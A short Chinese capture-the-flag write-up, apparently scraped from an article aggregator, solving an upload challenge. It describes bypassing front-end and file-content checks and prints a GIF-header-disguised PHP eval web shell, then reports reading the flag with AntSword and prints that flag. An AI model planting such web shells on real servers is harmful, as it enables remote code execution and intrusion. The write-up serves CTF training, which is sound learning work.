当前位置: 首页 > article >正文

[极客大挑战 2019]Upload1

题目

直接传马,

可以看到有前端检查和对文件内容进行检查,我们将文件名改成shell.jpg进行上传。

翻译不!黑客!您的文件包含“<?

 先绕过前端验证,然后加上文件头即可上传成功

GIF89a
<script language='php'>@eval($_POST['md']);</script>

上传成功 

上传成功之后,没有给我们具体的存储位置,我们猜测应该是存在/upload的路径之下,然后我们试着去访问文件。 

蚁剑连接读取flag

 

拿下flag

flag{dbbfcaab-cc3e-420b-8dc8-3711ef452ac9}


http://www.kler.cn/a/518494.html

相关文章:

  • erase() 【删数函数】的使用
  • 基于springboot+vue的古城景区管理系统的设计与实现
  • git Bash通过SSH key 登录github的详细步骤
  • MAX98357A一款数字脉冲编码调制(PCM)输入D类音频功率放大器
  • 基于SMPL的三维人体重建-深度学习经典方法之VIBE
  • Vue2下篇
  • 假期学习【Java程序】的实施方案
  • C#标准Mes接口框架(持续更新)
  • 三分钟简单了解一些HTML的标签和语法_02
  • 技术总结:FPGA基于GTX+RIFFA架构实现多功能SDI视频转PCIE采集卡设计方案
  • Linux 命令行网络连接指南
  • AIGC的企业级解决方案架构及成本效益分析
  • RocketMQ 的 Topic 和消息队列MessageQueue信息,是怎么分布到Broker的?怎么负载均衡到Broker的?
  • 数据结构——二叉树——堆(1)
  • 【后端开发】字节跳动青训营之性能分析工具pprof
  • 正则表达式以及Qt中的使用
  • 为什么UI导入png图会出现白边
  • Zbrush导入笔刷
  • Android中Service在新进程中的启动流程
  • “AI视觉贴装系统:智能贴装,精准无忧
  • 《论文翻译》KIMI K1.5:用大语言模型扩展强化学习
  • 保存复合型数据到h5文件
  • ptp同步时钟、ptp网络时间服务器、ptp主时钟、ptp从时钟、ptp精密同步时钟
  • 15 分布式锁和分布式session
  • ElasticSearch JavaRestClient查询之快速入门
  • antdesignvue统计数据源条数、计算某列合计值、小数计算不精确多了很多小数位